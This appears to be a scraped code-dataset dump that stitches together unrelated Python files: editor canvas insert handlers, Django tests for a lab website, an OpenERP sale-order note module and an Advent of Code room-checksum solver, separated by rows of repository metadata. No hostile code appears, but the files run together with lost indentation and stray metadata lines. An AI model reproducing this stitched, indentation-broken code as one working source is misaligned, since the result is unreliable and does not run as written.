class TextInsertHandler(EventHandler.EventHandler):
def __init__(self, editor, eventHandler):
self.editor = editor
self.canvas = editor.getCanvas()
self.eventHandler = eventHandler
#starts the handler.
def start(self):
self.current = None
# stops the handler.
def stop(self):
return self.current
#canvas events
def onCanvasButton(self, event):
if event.num == 1:
self.zoom = self.editor.getZoom()
x = event.x/self.zoom
y = event.y/self.zoom
self.current = self.editor.createText([x,y], "")
self.eventHandler.onInsertHandlerStopped(self.current)
# Named Connector Insertion handler
class NamedConnectorInsertHandler(EventHandler.EventHandler):
def __init__(self, editor, eventHandler):
self.editor = editor
self.canvas = editor.getCanvas()
self.eventHandler = eventHandler
#starts the handler.
def start(self):
self.current = None
# stops the handler.
def stop(self):
return self.current
#canvas events
def onCanvasButton(self, event):
if event.num == 1:
self.zoom = self.editor.getZoom()
x = event.x/self.zoom
y = event.y/self.zoom
self.current = self.editor.createNamedConnector([x,y])
self.eventHandler.onInsertHandlerStopped(self.current)
# Attribute Insertion handler
class AttributeInsertHandler(EventHandler.EventHandler):
def __init__(self, editor, eventHandler):
self.editor = editor
self.canvas = editor.getCanvas()
self.eventHandler = eventHandler
#starts the handler.
def start(self):
self.current = None
# stops the handler.
def stop(self):
return self.current
#canvas events
def onCanvasButton(self, event):
if event.num == 1:
self.zoom = self.editor.getZoom()
x = event.x/self.zoom
y = event.y/self.zoom
self.current = self.editor.createAttribute([x,y], "attribute")
self.eventHandler.onInsertHandlerStopped(self.current)
| gpl-3.0 | 4,496,965,744,688,791,000 | 31.039171 | 109 | 0.581589 | false | 3.986525 | false | false | false |
davebridges/Lab-Website | communication/tests.py | 2 | 14526 | """
This file contains the unit tests for the :mod:`communication` app.
Since this app has no models there is model and view tests:
* :class:`~communication.tests.CommunicationModelTests`
* :class:`~communication.tests.CommunicationViewTests`
"""
from lab_website.tests import BasicTests
from communication.models import LabAddress,LabLocation,Post
from personnel.models import Address, Person
from papers.models import Publication
from projects.models import Project
class CommunicationModelTests(BasicTests):
    '''This class tests the models in the :mod:`communication` app.'''
fixtures = ['test_address',]
def test_create_new_lab_address(self):
'''This test creates a :class:`~communication.models.LabAddress` with the required information.'''
test_address = LabAddress(type='Primary', address=Address.objects.get(pk=1)) #repeat for all required fields
test_address.save()
self.assertEqual(test_address.pk, 1) #presumes no models loaded in fixture data
def test_lab_address_unicode(self):
'''This tests the unicode representation of a :class:`~communication.models.LabAddress`.'''
test_address = LabAddress(type='Primary', address=Address.objects.get(pk=1)) #repeat for all required fields
test_address.save()
self.assertEqual(test_address.pk, 1) #presumes no models loaded in fixture data
self.assertEqual(test_address.__unicode__(), Address.objects.get(pk=1).__unicode__())
def test_create_new_lab_location(self):
'''This test creates a :class:`~communication.models.LabLocation` with the required information only.'''
test_location = LabLocation(name = 'Memphis',
type='City',
priority=1) #repeat for all required fields
test_location.save()
self.assertEqual(test_location.pk, 1) #presumes no models loaded in fixture data
def test_create_new_lab_location_all(self):
'''This test creates a :class:`~communication.models.LabLocation` with all fields included.'''
test_location = LabLocation(name = 'Memphis',
type='City',
priority=1,
address=Address.objects.get(pk=1),
url = 'www.cityofmemphis.org',
description = 'some description about the place',
lattitude = 35.149534,
longitude = -90.04898,) #repeat for all required fields
test_location.save()
self.assertEqual(test_location.pk, 1) #presumes no models loaded in fixture data
def test_lab_location_unicode(self):
        '''This test creates a :class:`~communication.models.LabLocation` with the required information and verifies its unicode representation.'''
test_location = LabLocation(name = 'Memphis',
type='City',
priority=1) #repeat for all required fields
test_location.save()
self.assertEqual(test_location.pk, 1)
self.assertEqual(test_location.__unicode__(), 'Memphis')
class CommunicationViewTests(BasicTests):
'''This class tests the views associated with the :mod:`communication` app.'''
def test_feed_details_view(self):
"""This tests the feed-details view, ensuring that templates are loaded correctly.
This view uses a user with superuser permissions so does not test the permission levels for this view."""
test_response = self.client.get('/feeds')
self.assertEqual(test_response.status_code, 200)
self.assertTemplateUsed(test_response, 'feed_details.html')
self.assertTemplateUsed(test_response, 'base.html')
self.assertTrue('google_calendar_id' in test_response.context)
def test_lab_rules_view(self):
'''This tests the lab-rules view.
The tests ensure that the correct template is used.
It also tests whether the correct context is passed (if included).
        This view uses a user with superuser permissions so it does not test the permission levels for this view.'''
test_response = self.client.get('/lab-rules')
self.assertEqual(test_response.status_code, 200)
self.assertTemplateUsed(test_response, 'lab_rules.html')
self.assertTemplateUsed(test_response, 'base.html')
self.assertTrue('lab_rules' in test_response.context)
self.assertTrue('lab_rules_source' in test_response.context)
    def test_data_resource_sharing_view(self):
'''This tests the data-resource-sharing view.
The tests ensure that the correct template is used.
It also tests whether the correct context is passed (if included).
        This view uses a user with superuser permissions so it does not test the permission levels for this view.'''
test_response = self.client.get('/data-resource-sharing')
self.assertEqual(test_response.status_code, 200)
self.assertTemplateUsed(test_response, 'data_sharing_policy.html')
self.assertTemplateUsed(test_response, 'base.html')
self.assertTrue('data_sharing_policy' in test_response.context)
self.assertTrue('data_sharing_policy_source' in test_response.context)
def test_twitter_view(self):
'''This tests the twitter view.
Currently it just ensures that the template is loading correctly.
'''
test_response = self.client.get('/twitter')
self.assertEqual(test_response.status_code, 200)
self.assertTemplateUsed(test_response, 'twitter_timeline.html')
self.assertTemplateUsed(test_response, 'base.html')
self.assertTrue('timeline' in test_response.context)
def test_calendar_view(self):
'''This tests the google-calendar view.
Currently it just ensures that the template is loading correctly.
'''
test_response = self.client.get('/calendar')
self.assertEqual(test_response.status_code, 200)
self.assertTemplateUsed(test_response, 'calendar.html')
self.assertTemplateUsed(test_response, 'base.html')
self.assertTrue('google_calendar_id' in test_response.context)
#
# def test_wikipedia_view(self):
# '''This tests the google-calendar view.
#
# Currently it just ensures that the template is loading correctly.
# '''
# test_response = self.client.get('/wikipedia')
# self.assertEqual(test_response.status_code, 200)
# self.assertTemplateUsed(test_response, 'wikipedia_edits.html')
# self.assertTemplateUsed(test_response, 'base.html')
# self.assertTemplateUsed(test_response, 'jquery_script.html')
# self.assertTrue('pages' in test_response.context)
def test_news_view(self):
'''This tests the lab-news view.
Currently it just ensures that the template is loading correctly.
'''
test_response = self.client.get('/news')
self.assertEqual(test_response.status_code, 200)
self.assertTemplateUsed(test_response, 'lab_news.html')
self.assertTemplateUsed(test_response, 'base.html')
#self.assertTrue('statuses' in test_response.context)
self.assertTrue('links' in test_response.context)
#self.assertTrue('milestones' in test_response.context)
def test_contact_page(self):
'''This tests the contact-page view.
Currently it just ensures that the template is loading correctly.
'''
test_response = self.client.get('/contact/')
self.assertEqual(test_response.status_code, 200)
self.assertTemplateUsed(test_response, 'contact.html')
self.assertTemplateUsed(test_response, 'base.html')
def test_location_page(self):
'''This tests the location view.
Currently it ensures that the template is loading, and that that the location_list context is passed.
'''
test_response = self.client.get('/location')
self.assertEqual(test_response.status_code, 200)
self.assertTemplateUsed(test_response, 'location.html')
self.assertTemplateUsed(test_response, 'base.html')
self.assertTrue('lablocation_list' in test_response.context)
class PostModelTests(BasicTests):
'''This class tests various aspects of the :class:`~papers.models.Post` model.'''
fixtures = ['test_publication','test_publication_personnel', 'test_project', 'test_personnel']
def test_create_new_post_minimum(self):
'''This test creates a :class:`~papers.models.Post` with the required information only.'''
test_post = Post(post_title="Test Post",
author = Person.objects.get(pk=1),
markdown_url = 'https://raw.githubusercontent.com/BridgesLab/Lab-Website/master/LICENSE.md')
test_post.save()
self.assertEqual(test_post.pk, 1)
def test_create_new_post_all(self):
'''This test creates a :class:`~papers.models.Post` with all fields entered.'''
test_post = Post(post_title="Test Post",
author = Person.objects.get(pk=1),
markdown_url = 'https://raw.githubusercontent.com/BridgesLab/Lab-Website/master/LICENSE.md',
paper = Publication.objects.get(pk=1),
project = Project.objects.get(pk=1))
test_post.save()
self.assertEqual(test_post.pk, 1)
def test_post_unicode(self):
'''This test creates a :class:`~papers.models.Post` and then verifies the unicode representation is correct.'''
test_post = Post(post_title="Test Post",
author = Person.objects.get(pk=1),
markdown_url = 'https://raw.githubusercontent.com/BridgesLab/Lab-Website/master/LICENSE.md')
test_post.save()
self.assertEqual(test_post.__unicode__(), "Test Post")
def test_post_slugify(self):
'''This test creates a :class:`~papers.models.Post` and then verifies the unicode representation is correct.'''
test_post = Post(post_title="Test Post",
author = Person.objects.get(pk=1),
markdown_url = 'https://raw.githubusercontent.com/BridgesLab/Lab-Website/master/LICENSE.md')
test_post.save()
self.assertEqual(test_post.post_slug, "test-post")
class PostViewTests(BasicTests):
'''These test the views associated with post objects.'''
fixtures = ['test_post','test_publication','test_publication_personnel', 'test_project', 'test_personnel']
def test_post_details_view(self):
"""This tests the post-details view, ensuring that templates are loaded correctly.
This view uses a user with superuser permissions so does not test the permission levels for this view."""
test_response = self.client.get('/posts/fixture-post')
self.assertEqual(test_response.status_code, 200)
self.assertTemplateUsed(test_response, 'post_detail.html')
self.assertTemplateUsed(test_response, 'base.html')
self.assertTemplateUsed(test_response, 'disqus_snippet.html')
self.assertTemplateUsed(test_response, 'analytics_tracking.html')
self.assertTrue('post' in test_response.context)
test_response = self.client.get('/posts/not-a-fixture-post')
self.assertEqual(test_response.status_code, 404)
def test_post_list(self):
"""This tests the post-list view, ensuring that templates are loaded correctly.
This view uses a user with superuser permissions so does not test the permission levels for this view."""
test_response = self.client.get('/posts/')
self.assertEqual(test_response.status_code, 200)
self.assertTemplateUsed(test_response, 'post_list.html')
self.assertTemplateUsed(test_response, 'base.html')
self.assertTemplateUsed(test_response, 'analytics_tracking.html')
self.assertTrue('post_list' in test_response.context)
def test_post_new(self):
"""This tests the post-new view, ensuring that templates are loaded correctly.
This view uses a user with superuser permissions so does not test the permission levels for this view."""
test_response = self.client.get('/posts/new')
self.assertEqual(test_response.status_code, 200)
self.assertTemplateUsed(test_response, 'post_form.html')
self.assertTemplateUsed(test_response, 'base.html')
self.assertTemplateUsed(test_response, 'analytics_tracking.html')
def test_post_edit(self):
"""This tests the post-edit view, ensuring that templates are loaded correctly.
This view uses a user with superuser permissions so does not test the permission levels for this view."""
test_response = self.client.get('/posts/fixture-post/edit')
self.assertEqual(test_response.status_code, 200)
self.assertTemplateUsed(test_response, 'post_form.html')
self.assertTemplateUsed(test_response, 'base.html')
self.assertTemplateUsed(test_response, 'analytics_tracking.html')
test_response = self.client.get('/posts/not-a-fixture-post/edit')
self.assertEqual(test_response.status_code, 404)
def test_post_delete(self):
"""This tests the post-edit view, ensuring that templates are loaded correctly.
This view uses a user with superuser permissions so does not test the permission levels for this view."""
test_response = self.client.get('/posts/fixture-post/delete')
self.assertEqual(test_response.status_code, 200)
self.assertTemplateUsed(test_response, 'confirm_delete.html')
self.assertTemplateUsed(test_response, 'base.html')
self.assertTemplateUsed(test_response, 'analytics_tracking.html')
test_response = self.client.get('/posts/not-a-fixture-post/delete')
self.assertEqual(test_response.status_code, 404) | mit | 4,207,600,598,767,648,300 | 47.748322 | 135 | 0.6403 | false | 4.336119 | true | false | false |
Micronaet/micronaet-mx8 | note_manage_sale/note.py | 1 | 3165 | # -*- coding: utf-8 -*-
###############################################################################
#
# Copyright (C) 2001-2014 Micronaet SRL (<http://www.micronaet.it>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
###############################################################################
import os
import sys
import logging
import openerp
import openerp.netsvc as netsvc
import openerp.addons.decimal_precision as dp
from openerp.osv import fields, osv, expression, orm
from datetime import datetime, timedelta
from dateutil.relativedelta import relativedelta
from openerp import SUPERUSER_ID, api
from openerp import tools
from openerp.tools.translate import _
from openerp.tools.float_utils import float_round as round
from openerp.tools import (DEFAULT_SERVER_DATE_FORMAT,
DEFAULT_SERVER_DATETIME_FORMAT,
DATETIME_FORMATS_MAP,
float_compare)
_logger = logging.getLogger(__name__)
class SaleOrder(orm.Model):
""" Sale order note
"""
_inherit = 'sale.order'
def onchange_note(self, cr, uid, ids, item_id, field, context=None):
''' On change pre
'''
res = {'value': {}}
if item_id:
res['value'][field] = self.pool.get('res.note.template').browse(
cr, uid, item_id, context=context)['text']
return res
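    # Picking a template in `text_note_pre_id`/`text_note_post_id` is intended to
    # trigger the onchange above, which copies the template's `text` into the
    # matching free-text field (the binding lives in the form view, not shown here).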
_columns = {
'text_note_pre_id': fields.many2one('res.note.template',
'Set pre'),
'text_note_post_id': fields.many2one('res.note.template',
'Set post'),
'text_note_pre': fields.text('Pre text'),
'text_note_post': fields.text('Post text'),
'text_delivery_note': fields.text('Delivery note'),
}
class SaleOrderLine(orm.Model):
""" Sale order line note
"""
_inherit = 'sale.order.line'
def onchange_note(self, cr, uid, ids, item_id, field, context=None):
''' On change pre
'''
res = {'value': {}}
if item_id:
res['value'][field] = self.pool.get('res.note.template').browse(
cr, uid, item_id, context=context)['text']
return res
_columns = {
'text_note_pre_id': fields.many2one('res.note.template',
'Set pre'),
'text_note_post_id': fields.many2one('res.note.template',
'Set post'),
'text_note_pre': fields.text('Pre text'),
'text_note_post': fields.text('Post text'),
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 | -2,294,202,357,215,178,500 | 34.561798 | 79 | 0.600632 | false | 3.936567 | false | false | false |
deepsrijit1105/edx-platform | lms/djangoapps/course_blocks/transformers/visibility.py | 15 | 2329 | """
Visibility Transformer implementation.
"""
from openedx.core.lib.block_structure.transformer import BlockStructureTransformer, FilteringTransformerMixin
from .utils import collect_merged_boolean_field
class VisibilityTransformer(FilteringTransformerMixin, BlockStructureTransformer):
"""
A transformer that enforces the visible_to_staff_only field on
blocks by removing blocks from the block structure for which the
user does not have access. The visible_to_staff_only field on a
block is percolated down to its descendants, so that all blocks
enforce the visibility settings from their ancestors.
For a block with multiple parents, access is denied only if
visibility is denied for all its parents.
Staff users are exempted from visibility rules.
"""
VERSION = 1
MERGED_VISIBLE_TO_STAFF_ONLY = 'merged_visible_to_staff_only'
@classmethod
def name(cls):
"""
Unique identifier for the transformer's class;
same identifier used in setup.py.
"""
return "visibility"
@classmethod
def _get_visible_to_staff_only(cls, block_structure, block_key):
"""
Returns whether the block with the given block_key in the
given block_structure should be visible to staff only per
computed value from ancestry chain.
"""
return block_structure.get_transformer_block_field(
block_key, cls, cls.MERGED_VISIBLE_TO_STAFF_ONLY, False
)
@classmethod
def collect(cls, block_structure):
"""
Collects any information that's necessary to execute this
transformer's transform method.
"""
collect_merged_boolean_field(
block_structure,
transformer=cls,
xblock_field_name='visible_to_staff_only',
merged_field_name=cls.MERGED_VISIBLE_TO_STAFF_ONLY,
)
def transform_block_filters(self, usage_info, block_structure):
# Users with staff access bypass the Visibility check.
if usage_info.has_staff_access:
return [block_structure.create_universal_filter()]
return [
block_structure.create_removal_filter(
lambda block_key: self._get_visible_to_staff_only(block_structure, block_key),
)
]
| agpl-3.0 | -5,523,226,499,395,695,000 | 34.287879 | 109 | 0.669815 | false | 4.427757 | false | false | false |
Stunkymonkey/face2movie | face2movie.py | 1 | 8450 | #!/usr/bin/env python3
import sys
import os.path
from math import atan, pi
import argparse
try:
import numpy as np
except:
sys.exit("Please install numpy")
try:
import cv2
except:
sys.exit("Please install OpenCV")
# Parser
parser = argparse.ArgumentParser()
parser.add_argument("-i", "--imagefolder", type=str,
dest="imagefolder", help="Path of images", required=True)
parser.add_argument("-s", "--facescale", type=str, dest="facescale",
help="scale of the face (default is 1/3)")
parser.add_argument("-f", "--fps", type=str, dest="fps",
help="fps of the resulting file (default is 24)")
parser.add_argument("-n", "--nameoftargetfile", type=str, dest="outputfile",
help="name of the output file")
parser.add_argument("-w", "--write", action="store_true", dest="write",
default=False, help="to write every single image to file")
parser.add_argument("-r", "--reverse", action="store_true", dest="reverse",
default=False, help="iterate the files reversed")
parser.add_argument("-q", "--quiet", action="store_false", dest="quiet",
default=True, help="the output should be hidden")
parser.add_argument("-m", "--multiplerender", action="store_true",
dest="multiplerender", default=False,
help="render the images multiple times")
# parsing the input
args = parser.parse_args()
imagefolder = args.imagefolder + "/"
if imagefolder is None:
sys.exit("No images given")
facescale = args.facescale
if facescale is None:
facescale = float(1.0 / 3)
else:
facescale = float(facescale)
if args.fps is None:
fps = 24
else:
fps = float(args.fps)
outputfile = args.outputfile
if outputfile is None:
outputfile = "animation"
write = bool(args.write)
reverse = bool(args.reverse)
quiet = bool(args.quiet)
multiplerender = bool(args.multiplerender)
# OpenCV files
if (os.path.isfile("haarcascade_frontalface_default.xml")):
face_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')
else:
sys.exit("haarcascade_frontalface_default.xml not found")
if (os.path.isfile("haarcascade_eye.xml")):
eye_cascade = cv2.CascadeClassifier('haarcascade_eye.xml')
else:
sys.exit("haarcascade_eye.xml not found")
def dectectFace(gray):
"""detecting faces"""
if multiplerender:
for i in np.arange(1.05, 1.65, 0.02)[::-1]:
faces = face_cascade.detectMultiScale(
gray, scaleFactor=i, minNeighbors=5, minSize=(60, 60))
if len(faces) == 1:
return faces
elif len(faces) > 1:
return None
# print(str(i) + "- useless calc:" + str(faces))
# print("no face found")
return None
else:
return face_cascade.detectMultiScale(
gray, scaleFactor=1.3, minNeighbors=5, minSize=(60, 60))
def detectEye(roi_gray):
"""detecting eyes"""
if multiplerender:
for i in np.arange(1.01, 1.10, 0.01)[::-1]:
eyes = eye_cascade.detectMultiScale(
roi_gray, scaleFactor=i, minNeighbors=5, minSize=(25, 25))
if len(eyes) == 2:
return eyes
elif len(eyes) > 2:
return None
# print(str(i) + "- useless calc:" + str(eyes))
# print("no eyes found")
return None
else:
return eye_cascade.detectMultiScale(
roi_gray, scaleFactor=1.05, minNeighbors=5, minSize=(25, 25))
def drawFaces(faces, img):
"""drawing faces (for debug)"""
for (x, y, w, h) in faces:
cv2.rectangle(img, (x, y), (x + w, y + h), (255, 0, 0), 1)
def drawEyes(eyes, img):
"""drawing eyes (for debug)"""
for (ex, ey, ew, eh) in eyes:
cv2.rectangle(img, (ex, ey), (ex + ew, ey + eh), (0, 255, 0), 1)
def detect(img, gray):
"""getting the image and returns the face and eyes"""
faces = dectectFace(gray)
# for making sure only having one face
if faces is None or len(faces) != 1:
return None, None
# drawFaces(faces, img)
for (x, y, w, h) in faces:
roi_gray = gray[y:y + h, x:x + w]
# roi_color = img[y:y + h, x:x + w]
eyes = detectEye(roi_gray)
# making sure only having two eyes
if eyes is None or len(eyes) != 2:
return None, None
# drawEyes(eyes, roi_color)
return faces, eyes
def matrixPicture(face, eyes, height, width):
"""calculation of rotation and movement of the image"""
center = tuple((face[0] + (face[2] / 2), face[1] + (face[3] / 2)))
moveMatrix = np.float32([[1, 0, (width / 2) - center[0]],
[0, 1, (height / 2) - center[1]]])
scale = float(min(height, width)) / float(face[2]) * facescale
eye1 = tuple((eyes[0][0] + (eyes[0][2] / 2),
eyes[0][1] + (eyes[0][3] / 2)))
eye2 = tuple((eyes[1][0] + (eyes[1][2] / 2),
eyes[1][1] + (eyes[1][3] / 2)))
x = (float(eye2[0]) - float(eye1[0]))
y = (float(eye2[1]) - float(eye1[1]))
if x == 0:
angle = 0
else:
angle = atan(y / x) * 180 / pi
rotMatrix = cv2.getRotationMatrix2D(center, angle, scale)
return moveMatrix, rotMatrix
def calculatePicture(file):
"""gettings infos of the image and applie the matrixes"""
img = cv2.imread(file)
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
faces, eyes = detect(img, gray)
# print("faces: " + str(faces) + " # eyes:" + str(eyes))
height, width, channels = img.shape
if faces is None or eyes is None:
return None
face = faces[0]
eye = [eyes[0], eyes[1]]
moveMatrix, rotMatrix = matrixPicture(face, eye, height, width)
dst = cv2.warpAffine(img, moveMatrix, (width, height))
dst = cv2.warpAffine(dst, rotMatrix, (width, height))
return dst
def checkInput():
""" check input and return files """
files = []
if imagefolder:
for file in os.listdir(imagefolder):
if os.path.isfile(os.path.join(imagefolder, file)) and not file.startswith("."):
files.append(imagefolder + file)
if len(files) == 0:
sys.exit("No files found")
if reverse:
files.sort(reverse=True)
else:
files.sort()
return files
def toMovie():
""" iterating the files and save them to movie-file """
files = checkInput()
codecs = cv2.VideoWriter_fourcc(*'FMP4')
height, width, channel = cv2.imread(files[0]).shape
video = cv2.VideoWriter(outputfile + ".mkv", codecs,
fps, (width, height), True)
if not video.isOpened():
sys.exit("Error when writing video file")
images = 0
found = 0
for file in files:
dst = calculatePicture(file)
images = images + 1
if quiet:
sys.stdout.flush()
sys.stdout.write("\rimages: " + str(images) + "/" +
str(len(files)) + " and " + str(found) +
" added to movie")
if dst is not None and video.isOpened():
found = found + 1
video.write(dst)
video.release()
if quiet:
print()
print("saved to " + outputfile + ".mkv")
def toFile():
""" iterating files and save them seperately """
destdir = os.path.join(os.path.abspath(".") + r"/tmp/")
import subprocess
files = checkInput()
if not os.path.exists(destdir):
os.makedirs(destdir)
for file in files:
dst = calculatePicture(file)
if dst is not None:
"""
try:
cv2.imshow('face2gif', dst)
cv2.waitKey(0)
except (KeyboardInterrupt):
cv2.destroyAllWindows()
cv2.destroyAllWindows()
"""
cv2.imwrite(destdir + os.path.basename(file), dst)
if quiet:
print("all files are safed in: " + str(destdir))
print("now generating gif ...")
print(subprocess.call(["convert", "-delay", fps,
"-loop", "0", "tmp/*.jpeg",
outputfile + ".gif"]))
else:
subprocess.call(["convert", "-delay", fps,
"-loop", "0", "tmp/*.jpeg", outputfile + ".gif"])
if __name__ == '__main__':
if write:
toFile()
else:
toMovie()
| mit | 5,641,609,435,180,680,000 | 30.64794 | 92 | 0.564734 | false | 3.463115 | false | false | false |
worldofchris/hover-client | hover/test/test_hover.py | 1 | 4699 | # -*- coding: utf-8 -*-
import unittest
from mock import patch, PropertyMock, Mock
import requests
from hover.client import HoverClient
class TestHover(unittest.TestCase):
def setUp(self):
self.DNS_ID = 12345
with patch('requests.post') as patched_post, patch('requests.request') as patched_request:
type(patched_post.return_value).ok = PropertyMock(return_value=True)
type(patched_post.return_value).cookies = PropertyMock(
return_value={"hoverauth": "foo",
"domains": []})
type(patched_request.return_value).ok = PropertyMock(return_value=True)
type(patched_request.return_value).json = Mock(
return_value={"succeeded": True,
"domains": [{"domain_name": "worldofchris.com",
"id": self.DNS_ID}]})
username = 'mrfoo'
password = 'keyboardcat'
domain_name = 'worldofchris.com'
self.client = HoverClient(username=username,
password=password,
domain_name=domain_name)
def testInitClient(self):
"""
Initalise the client
"""
self.assertEqual(self.client.dns_id, self.DNS_ID)
def testAddCname(self):
"""
Add a CNAME
"""
with patch('requests.request') as patched_request:
type(patched_request.return_value).json = Mock(
return_value={"succeeded": True})
expected = {"succeeded": True}
actual = self.client.add_record(type="CNAME",
name="megatron",
content="crazyland.aws.com")
self.assertEqual(actual, expected)
def testGetRecord(self):
"""
Get a record so we can check if it exists and has the
expected value
"""
with patch('requests.request') as patched_request:
type(patched_request.return_value).json = Mock(
side_effect=[{"succeeded": True,
"domains": [{"entries": [{"type": "CNAME",
"name": "megatron",
"content": "crazyland.aws.com",
"id": "dns1234"}]}
]}])
expected = {"name": "megatron",
"type": "CNAME",
"content": "crazyland.aws.com",
"id": "dns1234"}
actual = self.client.get_record(type="CNAME",
name="megatron")
self.assertEqual(actual, expected)
def testUpdateCname(self):
"""
Update content for an existing record
"""
with patch('requests.request') as patched_request:
type(patched_request.return_value).json = Mock(
side_effect=[{"succeeded": True,
"domains": [{"entries": [{"type": "CNAME",
"name": "megatron",
"content": "blah",
"id": "dns1234"}]}
]},
{"succeeded": True}])
expected = {"succeeded": True}
actual = self.client.update_record(type="CNAME",
name="megatron",
content="foo.aws.com")
self.assertEqual(actual, expected)
def testRemoveCname(self):
"""
Remove a CNAME
"""
with patch('requests.request') as patched_request:
type(patched_request.return_value).json = Mock(
side_effect=[{"succeeded": True,
"domains": [{"entries": [{"type": "CNAME",
"name": "megatron",
"content": "blah",
"id": "dns1234"}]}
]},
{"succeeded": True}])
expected = {"succeeded": True}
actual = self.client.remove_record(type="CNAME",
name="megatron")
self.assertEqual(actual, expected)
| bsd-2-clause | -7,305,272,005,122,384,000 | 40.219298 | 98 | 0.423707 | false | 5.203765 | true | false | false |
tiborsimko/invenio-search | invenio_search/api.py | 1 | 6164 | # -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2015-2018 CERN.
#
# Invenio is free software; you can redistribute it and/or modify it
# under the terms of the MIT License; see LICENSE file for more details.
"""Search engine API."""
import hashlib
from functools import partial
from elasticsearch import VERSION as ES_VERSION
from elasticsearch_dsl import FacetedSearch, Search
from elasticsearch_dsl.faceted_search import FacetedResponse
from elasticsearch_dsl.query import Bool, Ids
from flask import current_app, request
from .proxies import current_search_client
class DefaultFilter(object):
"""Shortcut for defining default filters with query parser."""
def __init__(self, query=None, query_parser=None):
"""Build filter property with query parser."""
self._query = query
self.query_parser = query_parser or (lambda x: x)
@property
def query(self):
"""Build lazy query if needed."""
return self._query() if callable(self._query) else self._query
def __get__(self, obj, objtype):
"""Return parsed query."""
return self.query_parser(self.query)
class MinShouldMatch(str):
"""Work-around for Elasticsearch DSL problem.
The ElasticSearch DSL Bool query tries to inspect the
``minimum_should_match`` parameter, but understands only integers and not
queries like "0<1". This class circumvents the specific problematic clause
in Elasticsearch DSL.
"""
def __lt__(self, other):
"""Circumvent problematic Elasticsearch DSL clause."""
return False
def __le__(self, other):
"""Circumvent problematic Elasticsearch DSL clause."""
return False
def __gt__(self, other):
"""Circumvent problematic Elasticsearch DSL clause."""
return False
def __ge__(self, other):
"""Circumvent problematic Elasticsearch DSL clause."""
return False
class RecordsSearch(Search):
"""Example subclass for searching records using Elastic DSL."""
class Meta:
"""Configuration for ``Search`` and ``FacetedSearch`` classes."""
index = '_all'
doc_types = None
fields = ('*', )
facets = {}
default_filter = None
"""Default filter added to search body.
Example: ``default_filter = DefaultFilter('_access.owner:"1"')``.
"""
def __init__(self, **kwargs):
"""Use Meta to set kwargs defaults."""
kwargs.setdefault('index', getattr(self.Meta, 'index', None))
kwargs.setdefault('doc_type', getattr(self.Meta, 'doc_types', None))
kwargs.setdefault('using', current_search_client)
kwargs.setdefault('extra', {})
min_score = current_app.config.get('SEARCH_RESULTS_MIN_SCORE')
if min_score:
kwargs['extra'].update(min_score=min_score)
super(RecordsSearch, self).__init__(**kwargs)
default_filter = getattr(self.Meta, 'default_filter', None)
if default_filter:
# NOTE: https://github.com/elastic/elasticsearch/issues/21844
self.query = Bool(minimum_should_match=MinShouldMatch("0<1"),
filter=default_filter)
def get_record(self, id_):
"""Return a record by its identifier.
:param id_: The record identifier.
:returns: The record.
"""
return self.query(Ids(values=[str(id_)]))
def get_records(self, ids):
"""Return records by their identifiers.
:param ids: A list of record identifier.
:returns: A list of records.
"""
return self.query(Ids(values=[str(id_) for id_ in ids]))
@classmethod
def faceted_search(cls, query=None, filters=None, search=None):
"""Return faceted search instance with defaults set.
:param query: Elastic DSL query object (``Q``).
:param filters: Dictionary with selected facet values.
:param search: An instance of ``Search`` class. (default: ``cls()``).
"""
search_ = search or cls()
class RecordsFacetedSearch(FacetedSearch):
"""Pass defaults from ``cls.Meta`` object."""
index = search_._index[0]
doc_types = getattr(search_.Meta, 'doc_types', ['_all'])
fields = getattr(search_.Meta, 'fields', ('*', ))
facets = getattr(search_.Meta, 'facets', {})
def search(self):
"""Use ``search`` or ``cls()`` instead of default Search."""
# Later versions of `elasticsearch-dsl` (>=5.1.0) changed the
# Elasticsearch FacetedResponse class constructor signature.
if ES_VERSION[0] > 2:
return search_.response_class(FacetedResponse)
return search_.response_class(partial(FacetedResponse, self))
return RecordsFacetedSearch(query=query, filters=filters or {})
def with_preference_param(self):
"""Add the preference param to the ES request and return a new Search.
The preference param avoids the bouncing effect with multiple
replicas, documented on ES documentation.
See: https://www.elastic.co/guide/en/elasticsearch/guide/current
/_search_options.html#_preference for more information.
"""
user_hash = self._get_user_hash()
if user_hash:
return self.params(preference=user_hash)
return self
def _get_user_agent(self):
"""Retrieve the request's User-Agent, if available.
Taken from Flask Login utils.py.
"""
user_agent = request.headers.get('User-Agent')
if user_agent:
user_agent = user_agent.encode('utf-8')
return user_agent or ''
def _get_user_hash(self):
"""Calculate a digest based on request's User-Agent and IP address."""
if request:
user_hash = '{ip}-{ua}'.format(ip=request.remote_addr,
ua=self._get_user_agent())
alg = hashlib.md5()
alg.update(user_hash.encode('utf8'))
return alg.hexdigest()
return None
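# Usage sketch (the index name and record id below are hypothetical, and the calls
# need a configured search client plus a Flask app/request context):
#
#     search = RecordsSearch(index='records').with_preference_param()
#     response = search.get_record(42).execute()
#
# Subclasses usually override ``Meta`` (index, doc_types, facets, default_filter)
# and call ``faceted_search()`` to drive faceted result pages.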
| mit | 5,341,746,374,392,759,000 | 33.435754 | 78 | 0.611778 | false | 4.236426 | false | false | false |
tlake/advent-of-code | 2016/day04_security_through_obscurity/python/src/part1.py | 1 | 1245 | #!/usr/bin/env python
"""Docstring."""
from collections import Counter
from functools import reduce
from common import (
get_input,
)
class RoomAnalyzer:
"""."""
def __init__(self, input_list=[]):
"""."""
self.input_list = input_list
def process_room_string(self, room_string):
"""."""
name = room_string[:-11].replace("-", "")
sector_id = int(room_string[-10:-7])
checksum = room_string[-6:-1]
return name, sector_id, checksum
def room_is_real(self, room_name, room_checksum):
"""."""
counter = Counter(room_name)
checked = ''.join(map(lambda x: x[0], sorted(counter.most_common(), key=lambda x: (-x[1], x[0]))))[:5]
return bool(checked == room_checksum)
def analyze_room(self, room_string):
"""."""
name, sector_id, checksum = self.process_room_string(room_string)
return sector_id if self.room_is_real(name, checksum) else 0
